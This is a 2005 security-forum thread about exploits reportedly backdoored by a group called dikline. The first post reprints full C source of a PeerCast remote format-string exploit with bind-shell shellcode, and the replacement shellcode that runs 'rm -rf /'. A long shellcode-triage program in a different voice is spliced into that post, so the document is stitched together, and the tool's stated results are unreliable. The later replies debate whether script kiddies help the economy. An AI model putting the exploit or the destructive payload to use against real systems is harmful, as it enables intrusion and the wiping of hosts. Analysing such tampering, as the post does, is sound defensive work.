Security Forums

Exploits Backdoored!!!

elboth1 (Just Arrived; joined 27 Jul 2005; posts: 0)
Posted: Wed Jul 27, 2005 4:35 am    Post subject: Exploits Backdoored!!!

I just read this.. WTF!!!!!
__________________

It has come to our attention that a large number of public
security exploits/software have been modified and re-posted
to legitimate trusted information sites for public download.

We have recently come across 5 exploits that have had a shellcode modification
after legit verification of trusted download sites.

The following information security sites have listed a number of modified exploits:

unl0ck security research
g0tfault security
m00 security

Unl0ck was recently broken into by an anti-security/hacker organization
named dikline (dikline.com ?) and ALL exploit sources were modified in different
ways to infect the host attempting to exploit them.

Numerous modified sources of "internal" / "0day" sources by a
security group named "m00 security" have also been reported as modified by
the dikline organization.

We have audited numerous public exploit codes and have come up with some interesting
results. The following is a clear example of modified shellcode:

Original shellcode of the exploit "p33r-b33r.c" by unl0ck:


/*
\ PeerCast <= 0.1211 remote format string exploit
/ [<< Public Release >>]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
}
//*******************************************

//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
//****************************************************************


//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************



//***********************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
    char * buf;
    unsigned char b0, b1, b2, b3;
    int start = 256;

    doit( b0, b1, b2, b3, retaddr );
    buf = (char *)malloc(999);
    memset( buf, 0, 999 );

    b3 -= figure;
    b2 -= figure;
    b1 -= figure;
    b0 -= figure;

    snprintf( buf, 999,
              "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
              b3 - 16 + start - base, offset,
              b2 - b3 + start, offset + 1,
              b1 - b2 + start, offset + 2,
              b0 - b1 + start, offset + 3 );

    return buf;
}
//*************************************************************************

//*************************************************************************
int
main( int argc, char * argv[] )
{
    struct sockaddr_in addr;
    int sock;
    char * fmt;
    char endian[31337], da_shell[31337];
    unsigned long locaddr, retaddr;
    unsigned int offset, base;
    unsigned char b0, b1, b2, b3;

    system("clear");
    printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
    printf("*^*^*^ by Darkeagle ^*^*^*\n");
    printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");

    memset( endian, 0x00, 31337 );
    memset( da_shell, 0x00, 31337 );

    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(HOST);

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

    locaddr = GOTADDR;
    retaddr = SHELLADDR;
    offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

    doit( b0, b1, b2, b3, locaddr );

    base = 4;
    printf("[*] Buildin' evil code\n");
    strcat(endian, "GET /html/en/index.html");
    snprintf( endian+strlen(endian), sizeof(endian),
              "%c%c%c%c"
              "%c%c%c%c"
              "%c%c%c%c"
              "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 1, b2, b1, b0,
              b3 + 2, b2, b1, b0,
              b3 + 3, b2, b1, b0 );

    fmt = evil_builder( retaddr, offset, base, 0x10 );

    memset(fmt+strlen(fmt), 0x55, 32);
    strcat(fmt, shellcode);
    strcat(endian, fmt);
    strcat(endian, "\r\n\r\n\r\n");
    printf("[+] Buildin' complete!\n");
    sprintf(da_shell, "telnet %s 4444", HOST);

    // just go, y0!
    printf("[*] Connectin'\n");
    if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) {
        printf("[-] Connection failed!\n\n");
        exit(0);
    }

    printf("[+] Connected!\n");
    printf("[*] Sleepin'\n");
    sleep(1);

    printf("[*] Sendin'\n");
    send(sock, endian, strlen(endian), 0);

    printf("[*] Sleepin'\n");
    sleep(1);

    printf("[*] Connectin' in da shell\n\n");
    sleep(1);
    system(da_shell);
    return 0;
}


----------- Replaced modified shellcode to rm -rf remote host:


//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
//****************************************************************


The above shellcode is a modified version that was found listed
on the unl0ck security website under downloads days before the
site went down.

We have audited and found differences in shellcode on the following code:

(POSSIBLY MANY MORE)

unrealmagic.c - shellcode modified to rm -rf /* host
p33r-b33r.c - shellcode modified to rm -rf /* host
0x666-ftpd.c - shellcode modified to rm -rf /* host
gotfault-htdead.c - shellcode modified to rm -rf /* host
gotfault-lcdproc.c - shellcode modified to install LKM
gotfault-newspost.c - shellcode modified to rm -rf /* host
gotfault-ngircd.c - shellcode modified to rm -rf /* host
gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
gotfault-openftpd-msg.c - shellcode modified to install LKM
gotfault-pbs4q.c - shellcode modified to add password to mail users
gotfault-putty.c - shellcode modified to install LKM
gotfault-realmagicV2.c - shellcode modified to install LKM
gotfault-sing.sh - shellcode modified to install unknown backdoor.
gotfault-vmpsd.c - shellcode modified to rm -rf /* host
gotfault-zebedee.c - shellcode modified to rm -rf /* host
gotfault-zebedee-win32.zip - unknown
gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
gotfault-3cdsmash.c - shellcode modified to install NEW LKM
gotfault-psoproxy.c - shellcode modified to install LKM
gotfault-pcwsd.c - shellcode modified to install LKM


This is an urgent notice to all of the security individuals who have downloaded
any of the above (and more) exploits. Please take note of your collections;
we must find out what this dikline organization has backdoored and fix it!

*** MAKE SURE to check your shellcode whenever possible.


That is CRAZY! Guess imma have to check my code now DOH =(((
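The closing advice of the notice quoted above, check your shellcode, is easier to act on with a small tool than by eye: the original payload is XOR-encoded, so there are no plaintext strings to look for, while the replacement keeps the `// binds 4444 port` comment over a completely different payload. The program below is an added example written for this page; it is not code from the original post, from unl0ck or from dikline. It takes the two `shellcode[]` arrays exactly as quoted, undoes the fnstenv/XOR decoder stub that wraps the original so the port bytes can be checked against the comment, rebuilds the stack image the replacement constructs with `push imm32` so its command line becomes readable, and reports the syscall number behind the first `int 0x80` of each. Assumptions: 32-bit Linux x86 payloads, a 256-byte scratch stack, and only the handful of opcodes these two payloads use are modelled (push imm32, push eax, xor eax,eax, mov byte [esp+disp8],al, int 0x80); every function name is mine.

```c
/* shellcode_triage.c: added example, not code from the page, unl0ck or dikline.
 * Triage of the two shellcode[] arrays quoted from p33r-b33r.c above; assumes
 * 32-bit Linux x86 payloads and models only the opcodes these two use. */
#include <stdio.h>
#include <string.h>
#define STACK_SZ 256

static const unsigned char ORIGINAL[] =   /* as posted; its comment says "binds 4444 port" */
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
static const unsigned char MODIFIED[] =   /* as found on the unl0ck download page; same comment */
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

/* Offset of the m-byte pattern pat in buf, or -1. */
long find_bytes(const unsigned char *buf, size_t n, const void *pat, size_t m)
{
    for (size_t i = 0; i + m <= n; i++) if (memcmp(buf + i, pat, m) == 0) return (long)i;
    return -1;
}

/* Undo the decoder stub on the original: 31 c9 83 e9 -N (ecx = N dwords); d9 ee d9 74 24 f4 5b
 * (fldz; fnstenv [esp-0xc]; pop ebx = address of the fldz, offset 5); 81 73 13 KEY (xor dword
 * [ebx+0x13], KEY, so decoding starts at offset 24); 83 eb fc e2 f4 (sub ebx,-4; loop).
 * Returns the decoded length, or 0 when the stub is absent. */
size_t decode_fnstenv_xor(const unsigned char *sc, size_t len, unsigned char *out, size_t outsz)
{
    if (len < 24 || memcmp(sc, "\x31\xc9\x83\xe9", 4)
        || memcmp(sc + 5, "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13", 10)
        || memcmp(sc + 19, "\x83\xeb\xfc\xe2\xf4", 5))
        return 0;
    size_t ndw = (0x100 - sc[4]) & 0xff, n = 0;           /* sub ecx,-N  ->  ecx = N */
    for (size_t off = 24; off < len && n < outsz && n < ndw * 4; off++, n++)
        out[n] = sc[off] ^ sc[15 + (n & 3)];               /* KEY bytes are sc[15..18] */
    return n;
}

/* Rebuild what the payload pushes (push imm32, push eax) and apply its "mov byte [esp+d8], al"
 * NUL patches while al is known zero.  img gets the image lowest address first; returns its
 * length.  Bytes of unknown value show as '?'. */
size_t build_stack_image(const unsigned char *sc, size_t len, unsigned char *img, size_t imgsz)
{
    unsigned char st[STACK_SZ]; memset(st, '?', sizeof st);
    size_t sp = STACK_SZ, i = 0, n; int eax_zero = 0;
    while (i < len) {
        unsigned char op = sc[i];
        if (op == 0x68 && i + 5 <= len && sp >= 4) { sp -= 4; memcpy(st + sp, sc + i + 1, 4); i += 5; }
        else if (op == 0x50 && sp >= 4) { sp -= 4; memset(st + sp, eax_zero ? 0 : '?', 4); i++; }
        else if (op == 0x31 && i + 1 < len && sc[i + 1] == 0xc0) { eax_zero = 1; i += 2; }
        else if (op == 0x88 && i + 3 < len && sc[i + 1] == 0x44 && sc[i + 2] == 0x24 && eax_zero
                 && sp + sc[i + 3] < STACK_SZ) { st[sp + sc[i + 3]] = 0; i += 4; }
        else i++;                               /* anything else: not modelled, step one byte */
    }
    n = STACK_SZ - sp < imgsz ? STACK_SZ - sp : imgsz;
    memcpy(img, st + sp, n);
    return n;
}

/* Syscall number of the first "int 0x80" whose eax came from "mov al, imm8" (b0 xx) or
 * "push imm8; pop eax" (6a xx 58) within the preceding 8 bytes; -1 if there is none. */
int first_syscall(const unsigned char *sc, size_t len)
{
    for (size_t i = 1; i + 1 < len; i++) {
        if (sc[i] != 0xcd || sc[i + 1] != 0x80) continue;
        for (size_t j = i; j-- > 0 && i - j <= 8;) {
            if (sc[j] == 0xb0 && j + 1 < i) return sc[j + 1];
            if (sc[j] == 0x6a && j + 2 < i && sc[j + 2] == 0x58) return sc[j + 1];
        }
        return -1;
    }
    return -1;
}

/* Named checks over the two arrays, callable without any setup. */
size_t original_decode(unsigned char *d, size_t sz) { return decode_fnstenv_xor(ORIGINAL, sizeof ORIGINAL - 1, d, sz); }
long original_port_offset(void)             /* htons(4444) is the byte pair 11 5c */
{ unsigned char d[128]; size_t n = original_decode(d, sizeof d); return find_bytes(d, n, "\x11\x5c", 2); }
int original_first_syscall(void)
{ unsigned char d[128]; size_t n = original_decode(d, sizeof d); return first_syscall(d, n); }
long modified_string_offset(const char *s)  /* offset of s, NUL included, in the stack image */
{ unsigned char img[STACK_SZ]; size_t n = build_stack_image(MODIFIED, sizeof MODIFIED - 1, img, sizeof img);
  return find_bytes(img, n, s, strlen(s) + 1); }

int main(void)
{
    unsigned char d[128];
    printf("original: port bytes 11 5c at offset %ld of the decoded payload; first syscall %d (102 = socketcall)\n",
           original_port_offset(), original_first_syscall());
    printf("modified: decoder stub %s; first syscall %d (11 = execve); stack image holds "
           "\"/bin/sh\" at %ld, \"-c\" at %ld, \"rm -rf /\" at %ld\n",
           decode_fnstenv_xor(MODIFIED, sizeof MODIFIED - 1, d, sizeof d) ? "present" : "absent",
           first_syscall(MODIFIED, sizeof MODIFIED - 1), modified_string_offset("/bin/sh"),
           modified_string_offset("-c"), modified_string_offset("rm -rf /"));
    return 0;
}
```

Built with `cc -std=c99 -Wall -o shellcode_triage shellcode_triage.c`, it reports the original decoding to a payload whose first syscall is 102 (socketcall) and which carries the byte pair 11 5c (4444 in network order) at offset 20, consistent with the comment; the replacement has no decoder stub, builds "/bin/sh", "-c" and "rm -rf /" on the stack and calls syscall 11 (execve). Two caveats: the command is `rm -rf /` rather than the `rm -rf /*` the list in the notice writes, which changes nothing for the host; and the tool recognises one specific decoder stub, so "absent" on some other sample means only that. A payload you cannot decode to readable intent, or whose decoded behaviour differs from its comment, should be treated as untrusted rather than run.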
Groovicus (Trusted SF Member; joined 19 May 2004; posts: 9; Centerville, South Dakota)
Posted: Wed Jul 27, 2005 5:12 am

Aww... exploits were backdoored? <insert sarcastic comment>

I guess my question would be "What do you expect"?..... No honor among thieves and whut..
AdamV (SF Mod; joined 06 Oct 2004; posts: 24; Leeds, UK)
Posted: Wed Jul 27, 2005 10:16 am

Wouldn't this story be great propaganda even if it is not true!

"Waiting for Gullible", a short film.

Official government person: "we can't stop these damn script kiddies and they're harming our economy"
Bright ideas man: "why don't we hack the crackers and break their shellcode?"
OGP: "Human rights, freedom of speech, computer misuse - all our own laws prevent us from doing that"
BIM: "What if we just said we did it?"
OGP: "Dear Press Release..."
...
skrypt kyddz: "Oh no, I'm too lame to be able to work out if my sploit is hacked, so I daren't use it!"
...
World:" ouch, my bleeding heart (and aching sides from ROFLMAO)"

-Fin-
bsdevious (Just Arrived; joined 27 Oct 2004; posts: 0)
Posted: Sun Aug 07, 2005 10:58 pm

Script kids more so help the economy than harm it. Most of the lame whitehat industry depends on them keeping them in jobs.

Don't get me wrong, I'm not into ./hacking servers, I just see it from that stand point.
Groovicus (Trusted SF Member; joined 19 May 2004; posts: 9; Centerville, South Dakota)
Posted: Sun Aug 07, 2005 11:01 pm

Script Kiddies don't contribute anything. They're not the ones with the talent.
bsdevious (Just Arrived; joined 27 Oct 2004; posts: 0)
Posted: Sun Aug 07, 2005 11:13 pm

groovicus wrote:
Script Kiddies don't contribute anything. They're not the ones with the talent.

Now that statement doesn't make any sense. How do those 2 factors retort my statement above?
Groovicus (Trusted SF Member; joined 19 May 2004; posts: 9; Centerville, South Dakota)
Posted: Mon Aug 08, 2005 12:23 am

Script Kiddies help the economy how? That's analogous to saying that shoplifters help the economy because more security guards then have jobs. Contributing implies that something is gained, when in reality, Script Kiddie activity only hurts the economy by causing increased expense for everybody. When a vendor has to sink millions into a product to ensure that Skiddies can't have their way with the product, the cost is then passed on to the consumer. If I have less money (along with billions of other consumers) to spend on other consumables, then the economy as a whole suffers.

Businesses have to hire more security personnel, which in turn increases overhead, which again is passed on to the consumer. The consumer has less money to spend, and again the economy suffers.

Lost productivity also has a negative influence on the economy.

Script Kiddies have no talent; they are mere sheep. The ones that contribute are the ones that discover the vulnerabilities in the first place.
capi (SF Senior Mod; joined 21 Sep 2003; posts: 16777097; Portugal)
Posted: Mon Aug 08, 2005 12:48 am

Money doesn't just disappear into the void, you know - money that A spends is money that B earns.
Groovicus (Trusted SF Member; joined 19 May 2004; posts: 9; Centerville, South Dakota)
Posted: Mon Aug 08, 2005 1:39 am

Which would be just fine if everybody was involved in some aspect of computers/software as anything other than a consumer, then the money would be equitably distributed. I have to pay my ISP more, because they have to increase their security, purchase better filtering software, and pay more techs. Granted, there are other factors that contribute to overhead, but it still plays a part.

I pay more at stores because those that own the stores have to absorb losses, and it only makes sense to pass it on to the consumer. Wal-Mart might have cool stuff, but I have not got a check from them recently. I pay more for insurance because insurance fraud costs billions of dollars in losses. Those that own the businesses don't absorb it, the consumer does.

And since losses contribute to necessary expenses (food, insurance, shelter, etc.), I am forced to spend more money. Of that money, an extra $50 per month would grow nicely if put to work for me.

Just for the sake of argument, say on average I eat $2000 worth of food every year, and me being an average person, am comparable with all others (age notwithstanding). In the United States alone, the 2000 Census estimates the population to be around 290 million. If we could decrease shoplifting and fraud enough to decrease food costs by an arbitrary $5 per year, the economy would have an extra, what, billion and a half of discretionary income...

If we could somehow save $5 per person when it comes to insurance, health care, and housing, the amount of available discretionary income becomes staggering. It adds up.

All of which is irrelevant, because I still don't agree that Script Kiddies contribute anything, any more than Syphilis contributes to the penicillin industry.

Quote:
Money doesn't just disappear into the void, you know

It does at bill time at my house.
alt.don (SF Boss; joined 04 Mar 2003; posts: 16777079)
Posted: Mon Aug 08, 2005 1:49 am

Hey Groovicus,

I agree with you wholeheartedly. Though very few see it that way as evidenced by the various opinions in this thread. Vive la difference!
capi (SF Senior Mod; joined 21 Sep 2003; posts: 16777097; Portugal)
Posted: Mon Aug 08, 2005 5:00 pm

groovicus wrote:
All of which is irrelevant, because I still don't agree that Script Kiddies contribute anything, any more than Syphilis contributes to the penicillin industry.

Ah, but there lies the point. Without the need there would be no product; without diseases there would be no medicine, no multi-billion-dollar pharmaceutical industries, etc.

While obviously not being a good thing per se, you cannot argue the fact that disease does contribute in a major way to a huge industry. Likewise for security threats all around (IT, privacy, physical, etc) - without them, there would be no need for security companies and products. In effect, there would be no need for most of the people that post in this forum.

Goods and services here, like anywhere else. Jobs for people, taxes for the state; in general, cash is flowing. As I said in my previous post, money you spend is money someone else earns, regardless of the final distribution of the money.

In a capitalist, or near-capitalist, society, the security industry is no different from an economic standpoint than the food industry, the medicine industry, or the entertainment industry: a few people get richer, a lot of people get poorer - no news there.
AdamV (SF Mod; joined 06 Oct 2004; posts: 24; Leeds, UK)
Posted: Mon Aug 08, 2005 5:12 pm

I think the point here is that without syphilis we would still use penicillin to deal with other infections, just as we would need tools to deal with crackers and black hats even if there were no skript kidz spreading problems more widely but with no real skills.
comrade (Just Arrived; joined 15 Feb 2005; posts: 0)
Posted: Tue Aug 09, 2005 5:38 am

You have a problem. An industry develops to solve that problem.

If there were no illnesses then the medical profession wouldn't exist; there would be a couple of million fewer people employed in that particular field.
But that's a good thing: those people would then be able to contribute in other fields, such as research/engineering. In the end we would have all that time and resources being used elsewhere - we'd have more resources on the whole for important things, like eliminating dialup.

If given the chance, I would opt for no problem in the first place, and therefore no millions of jobs revolving around solving that problem and wasting resources on it when we could be further advancing humanity.

Justifying the existence of a problem by saying "hey look, we can employ people to solve it" seems odd to me.
ToxicAsp (Just Arrived; joined 07 Sep 2005; posts: 0; Around the world!)
Posted: Wed Sep 07, 2005 6:42 pm

I agree with capi... SKs get us the job, same as white/black hats. Thanks to God there are still people out there trying to get into the nets; else, where would Security Techs be?
AdamV (SF Mod; joined 06 Oct 2004; posts: 24; Leeds, UK)
Posted: Wed Sep 07, 2005 8:28 pm

at home with their families where they should be more often!
All times are GMT + 2 Hours